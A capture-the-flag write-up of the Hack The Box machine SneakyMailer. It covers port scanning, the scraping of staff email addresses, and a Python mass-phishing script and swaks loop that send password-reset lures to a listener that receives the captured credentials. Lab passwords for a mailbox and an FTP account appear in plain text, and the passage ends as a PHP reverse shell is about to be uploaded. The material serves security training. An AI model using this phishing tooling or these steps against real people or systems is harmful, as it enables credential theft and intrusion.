I"±˜<blockquote>
  <p>SneakyMailer starts off with Web enumeration where we discover a list of email addresses and send them phishing mails. One of the user triggers the link and drops his creds via POST request, Using those creds we get access to his mailbox where we find creds for accessing FTP. Inside FTP we find a subdomain web directory to which we can upload our php reverse shell and acquire shell on the machine. Further enumerating we find another subdomain which is a PyPi server, for elevating privileges to next user we leverage this service to upload a malicious python package which drops a SSH public key allowing us to SSH as that user. For root we abuse pip3 sudo privileges permitting us to get root shell.</p>
</blockquote>

<h2 id="reconnaissance">Reconnaissance</h2>

<h4 id="masscan">masscan</h4>

<p><code class="language-plaintext highlighter-rouge">masscan</code> discovers seven open TCP ports.</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
</pre></td> --><td class="rouge-code"><pre>cfx:  ~/Documents/htb/sneakymailer
‚Üí masscan <span class="nt">-e</span> tun0 <span class="nt">-p1-65535</span> <span class="nt">--rate</span> 500 10.10.10.197 | <span class="nb">tee </span>masscan.ports

Starting masscan 1.0.5 <span class="o">(</span>http://bit.ly/14GZzcT<span class="o">)</span> at 2020-11-23 18:38:09 GMT
 <span class="nt">--</span> forced options: <span class="nt">-sS</span> <span class="nt">-Pn</span> <span class="nt">-n</span> <span class="nt">--randomize-hosts</span> <span class="nt">-v</span> <span class="nt">--send-eth</span>
Initiating SYN Stealth Scan
Scanning 1 hosts <span class="o">[</span>65535 ports/host]
Discovered open port 22/tcp on 10.10.10.197
Discovered open port 8080/tcp on 10.10.10.197
Discovered open port 80/tcp on 10.10.10.197
Discovered open port 143/tcp on 10.10.10.197
Discovered open port 25/tcp on 10.10.10.197
Discovered open port 993/tcp on 10.10.10.197
Discovered open port 21/tcp on 10.10.10.197
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Formatting masscan results with <code class="language-plaintext highlighter-rouge">awk</code> and <code class="language-plaintext highlighter-rouge">sed</code> and running the ports against <code class="language-plaintext highlighter-rouge">nmap</code>:</p>

<h4 id="nmap">nmap</h4>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
</pre></td> --><td class="rouge-code"><pre>cfx:  ~/Documents/htb/sneakymailer
‚Üí <span class="nb">cat </span>masscan.ports | <span class="nb">grep </span>tcp | <span class="nb">sed</span> <span class="s1">'s/Discovered open port //'</span> | <span class="nb">awk</span> <span class="nt">-F</span>/ <span class="s1">'{print $1}'</span> <span class="nv">ORS</span><span class="o">=</span><span class="s1">','</span>
22,8080,80,143,25,993,21,

cfx:  ~/Documents/htb/sneakymailer
‚Üí nmap  <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">-p22</span>,8080,80,143,25,993,21 10.10.10.197
Starting Nmap 7.91 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2020-11-24 00:19 IST
Nmap scan report <span class="k">for </span>10.10.10.197
Host is up <span class="o">(</span>0.082s latency<span class="o">)</span><span class="nb">.</span>

PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      vsftpd 3.0.3
22/tcp   open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 <span class="o">(</span>protocol 2.0<span class="o">)</span>
| ssh-hostkey:
|   2048 57:c9:00:35:36:56:e6:6f:f6:de:86:40:b2:ee:3e:fd <span class="o">(</span>RSA<span class="o">)</span>
|   256 d8:21:23:28:1d:b8:30:46:e2:67:2d:59:65:f0:0a:05 <span class="o">(</span>ECDSA<span class="o">)</span>
|_  256 5e:4f:23:4e:d4:90:8e:e9:5e:89:74:b3:19:0c:fc:1a <span class="o">(</span>ED25519<span class="o">)</span>
25/tcp   open  smtp     Postfix smtpd
|_smtp-commands: debian, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING,
80/tcp   open  http     nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Did not follow redirect to http://sneakycorp.htb
143/tcp  open  imap     Courier Imapd <span class="o">(</span>released 2018<span class="o">)</span>
|_imap-capabilities: QUOTA <span class="nv">UTF8</span><span class="o">=</span>ACCEPTA0001 IMAP4rev1 ENABLE <span class="nv">ACL2</span><span class="o">=</span>UNION OK ACL CAPABILITY completed UIDPLUS <span class="nv">THREAD</span><span class="o">=</span>REFERENCES STARTTLS IDLE CHILDREN SORT <span class="nv">THREAD</span><span class="o">=</span>ORDEREDSUBJECT NAMESPACE
| ssl-cert: Subject: <span class="nv">commonName</span><span class="o">=</span>localhost/organizationName<span class="o">=</span>Courier Mail Server/stateOrProvinceName<span class="o">=</span>NY/countryName<span class="o">=</span>US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-05-14T17:14:21
|_Not valid after:  2021-05-14T17:14:21
|_ssl-date: TLS randomness does not represent <span class="nb">time
</span>993/tcp  open  ssl/imap Courier Imapd <span class="o">(</span>released 2018<span class="o">)</span>
|_imap-capabilities: QUOTA <span class="nv">UTF8</span><span class="o">=</span>ACCEPTA0001 IMAP4rev1 ENABLE <span class="nv">ACL2</span><span class="o">=</span>UNION OK ACL CAPABILITY completed UIDPLUS <span class="nv">THREAD</span><span class="o">=</span>ORDEREDSUBJECT SORT IDLE CHILDREN <span class="nv">THREAD</span><span class="o">=</span>REFERENCES <span class="nv">AUTH</span><span class="o">=</span>PLAIN NAMESPACE
| ssl-cert: Subject: <span class="nv">commonName</span><span class="o">=</span>localhost/organizationName<span class="o">=</span>Courier Mail Server/stateOrProvinceName<span class="o">=</span>NY/countryName<span class="o">=</span>US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-05-14T17:14:21
|_Not valid after:  2021-05-14T17:14:21
|_ssl-date: TLS randomness does not represent <span class="nb">time
</span>8080/tcp open  http     nginx 1.14.2
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.14.2
|_http-title: Welcome to nginx!
Service Info: Host:  debian<span class="p">;</span> OSs: Unix, Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="nb">.</span>
Nmap <span class="k">done</span>: 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>60.40 seconds
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Port scan summary:</p>

<ul>
  <li>Port 21: FTP</li>
  <li>Port 22: SSH</li>
  <li>Port 25: SMTP</li>
  <li>Port 80,8080: HTTP Service</li>
  <li>Port 143,993: IMAP</li>
</ul>

<h3 id="port-21-ftp">Port 21: FTP</h3>

<p>Even though <code class="language-plaintext highlighter-rouge">nmap</code> didn‚Äôt point out anonymous login, it‚Äôs always better to cross check it manually:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre></td> --><td class="rouge-code"><pre>cfx:  ~/Documents/htb/sneakymailer
‚Üí ftp 10.10.10.197
Connected to 10.10.10.197.
220 <span class="o">(</span>vsFTPd 3.0.3<span class="o">)</span>
Name <span class="o">(</span>10.10.10.197:root<span class="o">)</span>: anonymous
530 Permission denied.
Login failed.
ftp&gt; <span class="nb">exit
</span>221 Goodbye.
</pre></td></tr></tbody></table></code></pre></div></div>
<p>We are not allowed to login as anonymous.</p>

<h3 id="port-80-sneakycorphtb">Port 80: sneakycorp.htb</h3>

<p>Visiting http://10.10.10.197, we get redirected to <a href="http://sneakycorp.htb">http://sneakycorp.htb</a> adding the vhost to <code class="language-plaintext highlighter-rouge">/etc/hosts</code> file, we are able to visit the website.</p>

<p>Home page presents us with some kind of dashboard with two Project status updates:</p>

<p><img src="/assets/img/Posts/SneakyM/website.png" alt="website" /></p>

<p>Except <a href="http://sneakycorp.htb/team.php"><strong>Team page</strong></a>, all the links are non-functional. However team‚Äôs page provides us lots of potential usernames and email addresses:</p>

<p><img src="/assets/img/Posts/SneakyM/team.png" alt="team" /></p>

<p>Using <code class="language-plaintext highlighter-rouge">awk</code> and <code class="language-plaintext highlighter-rouge">grep</code> we can create a list of all email addresses:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td> --><td class="rouge-code"><pre>cfx:  ~/Documents/htb/sneakymailer
‚Üí curl -s http://sneakycorp.htb/team.php | grep sneakymailer.htb | awk -F'&gt;' '{print $2}' | awk -F '&lt;' '{print $1}' &gt; email.txt

</pre></td></tr></tbody></table></code></pre></div></div>
<p>We have a total of 57 email id‚Äôs:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
</pre></td> --><td class="rouge-code"><pre>cfx:  ~/Documents/htb/sneakymailer
‚Üí <span class="nb">wc</span> <span class="nt">-l</span> emails.txt
57 emails.txt

‚Üí <span class="nb">head</span> <span class="nt">-n</span> 5 emails.txt
tigernixon@sneakymailer.htb
garrettwinters@sneakymailer.htb
ashtoncox@sneakymailer.htb
cedrickelly@sneakymailer.htb
airisatou@sneakymailer.htb
</pre></td></tr></tbody></table></code></pre></div></div>

<h4 id="directory-fuzzing">Directory Fuzzing</h4>

<p>Using <code class="language-plaintext highlighter-rouge">ffuf</code> to discover hidden files and directories, but unfortunately we don‚Äôt find anything interesting</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
</pre></td> --><td class="rouge-code"><pre>cfx:  ~/Documents/htb/sneakymailer
‚Üí ffuf <span class="nt">-c</span> <span class="nt">-r</span> <span class="nt">-u</span> http://sneakycorp.htb/FUZZ <span class="nt">-w</span> /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-words.txt <span class="nt">-e</span> .php,.txt <span class="nt">-fc</span> 403

        /<span class="s1">'___\  /'</span>___<span class="se">\ </span>          /<span class="s1">'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.0.2
________________________________________________

 :: Method           : GET
 :: URL              : http://sneakycorp.htb/FUZZ
 :: Extensions       : .php .txt
 :: Follow redirects : true
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403
 :: Filter           : Response status: 403
________________________________________________

index.php               [Status: 200, Size: 13538, Words: 3948, Lines: 335]
.                       [Status: 200, Size: 13538, Words: 3948, Lines: 335]
team.php                [Status: 200, Size: 26513, Words: 11161, Lines: 660]
:: Progress: [129009/129009]¬†:: Job [1/1] :: 503 req/sec :: Duration: [0:04:16] :: Errors: 0 ::
</span></pre></td></tr></tbody></table></code></pre></div></div>

<h3 id="port-8080-website">Port 8080: website</h3>

<p>Visiting port 8080, we get a default nginx installation success page:</p>

<p><img src="/assets/img/Posts/SneakyM/nginx.png" alt="nginx" /></p>

<p>Since we do not find anything interesting, we can go ahead and look at it later when we have something useful.</p>

<h2 id="shell-as-www-data">Shell as www-data</h2>

<h3 id="phishing-e-mail">Phishing E-mail</h3>

<p>The Box name indicates it has something to do with mails, and we already have acquired a list of emails which we can use to send phishing mail.</p>

<p>I wrote a python script utilizing smtplib and email.message module which sends a email with body including our host ip, once a user visits this link we get a POST request on <code class="language-plaintext highlighter-rouge">nc</code> listener with users creds.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
</pre></td> --><td class="rouge-code"><pre><span class="c1">#!/usr/bin/env python3
</span>
<span class="c1">## ultrafisher by ColdFusionX ##
</span>
<span class="kn">import</span> <span class="nn">smtplib</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">from</span> <span class="nn">email.message</span> <span class="kn">import</span> <span class="n">EmailMessage</span>
<span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span>

<span class="n">stats</span> <span class="o">=</span> <span class="n">log</span><span class="p">.</span><span class="n">progress</span><span class="p">(</span><span class="sa">f</span><span class="s">""</span><span class="p">)</span>
<span class="n">emailsfile</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="n">sys</span><span class="p">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]).</span><span class="n">readlines</span><span class="p">()</span>

<span class="n">HackerServer</span> <span class="o">=</span> <span class="p">(</span><span class="sa">f</span><span class="s">"http://10.10.14.3:8040"</span><span class="p">)</span> <span class="c1"># &lt;- Change this
</span>
<span class="c1">#Sender address
</span><span class="n">sender</span> <span class="o">=</span> <span class="s">'cold@fusionsecurity.cfx'</span>

<span class="c1">#Loop for Email addresses
</span><span class="k">for</span> <span class="n">recipients</span> <span class="ow">in</span> <span class="n">emailsfile</span><span class="p">:</span>
    <span class="n">recipients</span> <span class="o">=</span> <span class="n">recipients</span><span class="p">.</span><span class="n">strip</span><span class="p">()</span>
    <span class="n">stats</span><span class="p">.</span><span class="n">status</span><span class="p">(</span><span class="sa">f</span><span class="s">"Sending Mail to -&gt; "</span> <span class="sa">f</span><span class="s">"</span><span class="si">{</span><span class="n">recipients</span><span class="si">}</span><span class="s">"</span><span class="p">)</span>

    <span class="n">msg</span> <span class="o">=</span> <span class="n">EmailMessage</span> <span class="p">()</span>
    <span class="n">msg</span> <span class="p">[</span><span class="s">'Subject'</span><span class="p">]</span> <span class="o">=</span> <span class="p">(</span><span class="sa">f</span><span class="s">"Data Breach incident - Reset your password"</span><span class="p">)</span>
    <span class="n">msg</span> <span class="p">[</span><span class="s">'From'</span><span class="p">]</span> <span class="o">=</span> <span class="n">sender</span>
    <span class="n">msg</span> <span class="p">[</span><span class="s">'To'</span><span class="p">]</span> <span class="o">=</span> <span class="n">recipients</span>

<span class="c1">#Email Body
</span>    <span class="n">msg</span><span class="p">.</span><span class="n">set_content</span> <span class="p">(</span><span class="sa">f</span><span class="s">"Please reset your password visiting"</span> <span class="sa">f</span><span class="s">"</span><span class="si">{</span><span class="n">HackerServer</span><span class="si">}</span><span class="s">"</span><span class="p">)</span>
<span class="c1">#Target Server
</span>    <span class="k">try</span><span class="p">:</span>
        <span class="n">mail</span> <span class="o">=</span> <span class="n">smtplib</span><span class="p">.</span><span class="n">SMTP</span> <span class="p">(</span><span class="s">'10.10.10.197'</span><span class="p">,</span> <span class="mi">25</span><span class="p">)</span>
        <span class="n">mail</span><span class="p">.</span><span class="n">send_message</span> <span class="p">(</span><span class="n">msg</span><span class="p">)</span>
<span class="c1">#Failure Log
</span>    <span class="k">except</span> <span class="n">smtplib</span><span class="p">.</span><span class="n">SMTPException</span><span class="p">:</span>
        <span class="k">print</span><span class="p">()</span>
        <span class="n">log</span><span class="p">.</span><span class="n">failure</span><span class="p">(</span><span class="sa">f</span><span class="s">"Error Sending mail to "</span> <span class="o">+</span> <span class="n">recipients</span><span class="p">)</span>
<span class="k">print</span><span class="p">()</span>
<span class="n">log</span><span class="p">.</span><span class="n">success</span><span class="p">(</span><span class="sa">f</span><span class="s">"Phishing Mail Sent"</span><span class="p">)</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<h4 id="sending-mail">Sending Mail</h4>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td> --><td class="rouge-code"><pre>cfx:  ~/Documents/htb/sneakymailer
‚Üí ./ultrafisher.py emails.txt
<span class="o">[</span>‚àß] Sending Mail to -&gt; donnasnider@sneakymailer.htb

<span class="o">[</span>+] Phishing Mail Sent
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Once the mail is sent to all the email addresses, we should see a confirmation as <code class="language-plaintext highlighter-rouge">Phishing Mail Sent</code>. In case if we had any invalid email address the script should have pointed out that as well.</p>

<h4 id="creds">Creds</h4>

<p>Once the script execution is completed we get a call back on our listener with url encoded creds. It appears the user with email id <code class="language-plaintext highlighter-rouge">paulbyrd@sneakymailer.htb</code> visited our link and dropped his creds.</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
</pre></td> --><td class="rouge-code"><pre>cfx:  ~/Documents/htb/sneakymailer
‚Üí nc <span class="nt">-lvnp</span> 8040
Ncat: Version 7.91 <span class="o">(</span> https://nmap.org/ncat <span class="o">)</span>
Ncat: Listening on :::8040
Ncat: Listening on 0.0.0.0:8040
Ncat: Connection from 10.10.10.197.
Ncat: Connection from 10.10.10.197:58836.
POST / HTTP/1.1
Host: 10.10.14.3:8040
User-Agent: python-requests/2.23.0
Accept-Encoding: <span class="nb">gzip</span>, deflate
Accept: <span class="k">*</span>/<span class="k">*</span>
Connection: keep-alive
Content-Length: 185
Content-Type: application/x-www-form-urlencoded

<span class="nv">firstName</span><span class="o">=</span>Paul&amp;lastName<span class="o">=</span>Byrd&amp;email<span class="o">=</span>paulbyrd%40sneakymailer.htb&amp;password<span class="o">=</span>%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt&amp;rpassword<span class="o">=</span>%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt
</pre></td></tr></tbody></table></code></pre></div></div>

<h4 id="swaks">Swaks</h4>

<p>We could also achieve the same using <code class="language-plaintext highlighter-rouge">swaks</code> a commandline tool to send emails:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
</pre></td> --><td class="rouge-code"><pre>cfx:  ~/Documents/htb/sneakymailer
‚Üí <span class="k">for </span>i <span class="k">in</span> <span class="si">$(</span><span class="nb">cat </span>emails.txt<span class="si">)</span><span class="p">;</span> <span class="k">do </span>swaks <span class="nt">--server</span> 10.10.10.197 <span class="nt">--from</span> <span class="s1">'cold@fusionsecurity.cfx'</span> <span class="nt">--to</span> <span class="nv">$i</span> <span class="nt">--header</span> <span class="s2">"Subject: Anything"</span> <span class="nt">--body</span> <span class="s2">"Click on http://10.10.14.3:8040"</span><span class="p">;</span> <span class="k">done</span>
<span class="o">===</span> Trying 10.10.10.197:25...
<span class="o">===</span> Connected to 10.10.10.197.
&lt;-  220 debian ESMTP Postfix <span class="o">(</span>Debian/GNU<span class="o">)</span>
 -&gt; EHLO cfx
&lt;-  250-debian
&lt;-  250-PIPELINING
&lt;-  250-SIZE 10240000
&lt;-  250-VRFY
&lt;-  250-ETRN
&lt;-  250-STARTTLS
&lt;-  250-ENHANCEDSTATUSCODES
&lt;-  250-8BITMIME
&lt;-  250-DSN
&lt;-  250-SMTPUTF8
&lt;-  250 CHUNKING
 -&gt; MAIL FROM:&lt;cold@fusionsecurity.cfx&gt;
&lt;-  250 2.1.0 Ok
 -&gt; RCPT TO:&lt;tigernixon@sneakymailer.htb&gt;
&lt;-  250 2.1.5 Ok
 -&gt; DATA
&lt;-  354 End data with &lt;CR&gt;&lt;LF&gt;.&lt;CR&gt;&lt;LF&gt;
 -&gt; Date: Tue, 01 Dec 2020 21:54:22 +0530
 -&gt; To: tigernixon@sneakymailer.htb
 -&gt; From: cold@fusionsecurity.cfx
 -&gt; Subject: Anything
 -&gt; Message-Id: &lt;20201201215422.006428@cfx&gt;
 -&gt; X-Mailer: swaks v20190914.0 jetmore.org/john/code/swaks/
 -&gt;
 -&gt; Click on http://10.10.14.3:8040
 -&gt;
 -&gt;
 <span class="o">[</span>..SNIP..]
 &lt;-  250 2.0.0 Ok: queued as 51784246DE
 -&gt; QUIT
&lt;-  221 2.0.0 Bye
<span class="o">===</span> Connection closed with remote host.
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Call-back on nc listener:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
</pre></td> --><td class="rouge-code"><pre>cfx:  ~/Documents/htb/sneakymailer
‚Üí nc <span class="nt">-lvnp</span> 8040
Ncat: Version 7.91 <span class="o">(</span> https://nmap.org/ncat <span class="o">)</span>
Ncat: Listening on :::8040
Ncat: Listening on 0.0.0.0:8040
Ncat: Connection from 10.10.10.197.
Ncat: Connection from 10.10.10.197:54932.
POST / HTTP/1.1
Host: 10.10.14.3:8040
User-Agent: python-requests/2.23.0
Accept-Encoding: <span class="nb">gzip</span>, deflate
Accept: <span class="k">*</span>/<span class="k">*</span>
Connection: keep-alive
Content-Length: 185
Content-Type: application/x-www-form-urlencoded

<span class="nv">firstName</span><span class="o">=</span>Paul&amp;lastName<span class="o">=</span>Byrd&amp;email<span class="o">=</span>paulbyrd%40sneakymailer.htb&amp;password<span class="o">=</span>%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt&amp;rpassword<span class="o">=</span>%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt
</pre></td></tr></tbody></table></code></pre></div></div>

<p>After url decoding the data we have the following:</p>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre></td> --><td class="rouge-code"><pre><span class="go">firstName=Paul&amp;lastName=Byrd&amp;email=paulbyrd%40sneakymailer.htb&amp;password=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt&amp;rpassword=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt

firstName=Paul
lastName=Byrd
email=paulbyrd@sneakymailer.htb
</span><span class="gp">password=^(#</span>J@SkFv2[%KhIxKk<span class="o">(</span>Ju<span class="sb">`</span>hqcHl&lt;:Ht
<span class="gp">rpassword=^(#</span>J@SkFv2[%KhIxKk<span class="o">(</span>Ju<span class="sb">`</span>hqcHl&lt;:Ht
</pre></td></tr></tbody></table></code></pre></div></div>

<h3 id="paul-byrd---mailbox-access">Paul Byrd - Mailbox access</h3>

<p>Unfortunately Paul‚Äôs creds doesn‚Äôt work for on SSH or FTP but they did work for accessing his mailbox. We can use mail client such as thunderbird or Evolution to access his mailbox, here we‚Äôll be using thunderbird.</p>

<p>Step1: First open thunderbird then Select Local folder -&gt; Set up an account - Select Email -&gt; Give Paul‚Äôs Email and Password</p>

<p><img src="/assets/img/Posts/SneakyM/email1.png" alt="email1" /></p>

<p>Step2: Select Configure Manually -&gt; Go to Advance Config (You should see a prompt with account creation warning)</p>

<p><img src="/assets/img/Posts/SneakyM/email2.png" alt="email2" /></p>

<p>Step3: Change the username to <code class="language-plaintext highlighter-rouge">paulbyrd</code></p>

<p><img src="/assets/img/Posts/SneakyM/email3.png" alt="email3" /></p>

<p>Step4: Go to Outgoing Server(SMTP) option and fill Server details and Username</p>

<p><img src="/assets/img/Posts/SneakyM/email4.png" alt="email4" /></p>

<p>Now, You should see Paul‚Äôs mailbox has appeared on thunderbird, just right click -&gt; Get Messages and done now you should have Paul‚Äôs mailbox ready.</p>

<p>Inside Sent items, we find two mails one of which is a password reset mail.</p>

<p><img src="/assets/img/Posts/SneakyM/email5.png" alt="email5" /></p>

<h3 id="ftp---developer">FTP - developer</h3>

<p>Using developer creds we can login to FTP:</p>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td> --><td class="rouge-code"><pre><span class="go">Username: developer
Original-Password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C
</span></pre></td></tr></tbody></table></code></pre></div></div>
<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
</pre></td> --><td class="rouge-code"><pre>cfx:  ~/Documents/htb/sneakymailer
‚Üí ftp 10.10.10.197
Connected to 10.10.10.197.
220 <span class="o">(</span>vsFTPd 3.0.3<span class="o">)</span>
Name <span class="o">(</span>10.10.10.197:root<span class="o">)</span>: developer
331 Please specify the password.
Password:
230 Login successful.
Remote system <span class="nb">type </span>is UNIX.
Using binary mode to transfer files.
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Inside we find a <code class="language-plaintext highlighter-rouge">dev</code> directory:</p>
<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td> --><td class="rouge-code"><pre>ftp&gt; <span class="nb">ls
</span>200 PORT <span class="nb">command </span>successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxr-x    8 0        1001         4096 Jun 30 00:15 dev
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Inside dev we find website related data, although <code class="language-plaintext highlighter-rouge">team.php</code> looks familiar:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre></td> --><td class="rouge-code"><pre>ftp&gt; <span class="nb">cd </span>dev
250 Directory successfully changed.
ftp&gt; <span class="nb">ls
</span>200 PORT <span class="nb">command </span>successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 May 26 18:52 css
drwxr-xr-x    2 0        0            4096 May 26 18:52 img
<span class="nt">-rwxr-xr-x</span>    1 0        0           13742 Jun 23 08:44 index.php
drwxr-xr-x    3 0        0            4096 May 26 18:52 js
drwxr-xr-x    2 0        0            4096 May 26 18:52 pypi
drwxr-xr-x    4 0        0            4096 May 26 18:52 scss
<span class="nt">-rwxr-xr-x</span>    1 0        0           26523 May 26 19:58 team.php
drwxr-xr-x    8 0        0            4096 May 26 18:52 vendor
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Trying <code class="language-plaintext highlighter-rouge">sneakycorp.htb/dev/team.php</code> didn‚Äôt return anything. Which indicates there could be a subdomain which we are not aware of, having that thought in mind I decided to fuzz the site for subdomains.</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
</pre></td> --><td class="rouge-code"><pre>cfx:  ~/Documents/htb/sneakymailer
‚Üí ffuf <span class="nt">-c</span> <span class="nt">-r</span> <span class="nt">-u</span> http://10.10.10.197 <span class="nt">-H</span> <span class="s1">'Host:FUZZ.sneakycorp.htb'</span> <span class="nt">-w</span> /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt <span class="nt">-fl</span> 335

        /<span class="s1">'___\  /'</span>___<span class="se">\ </span>          /<span class="s1">'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.0.2
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.10.197
 :: Header           : Host: FUZZ.sneakycorp.htb
 :: Follow redirects : true
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403
 :: Filter           : Response lines: 335
________________________________________________

dev                     [Status: 200, Size: 13737, Words: 4007, Lines: 341]
:: Progress: [19983/19983]¬†:: Job [1/1] :: 243 req/sec :: Duration: [0:01:22] :: Errors: 0 ::
</span></pre></td></tr></tbody></table></code></pre></div></div>

<p>Adding <code class="language-plaintext highlighter-rouge">dev.sneakycorp.htb</code> into /etc/hosts file and visiting <a href="http://dev.sneakycorp.htb">http://dev.sneakycorp.htb</a> returns the similar kind of website which we saw earlier.</p>

<p><img src="/assets/img/Posts/SneakyM/dev.png" alt="dev" /></p>

<h3 id="reverse-shell">Reverse Shell</h3>

<p>It appears we can upload files into ftp and the root folder is of dev.sneakycorp.htb, So we‚Äôll upload a <a href="http://pentestmonkey.net/tools/web-shells/php-reverse-shell"><strong>PHP reverse shell</strong></a>:</p>

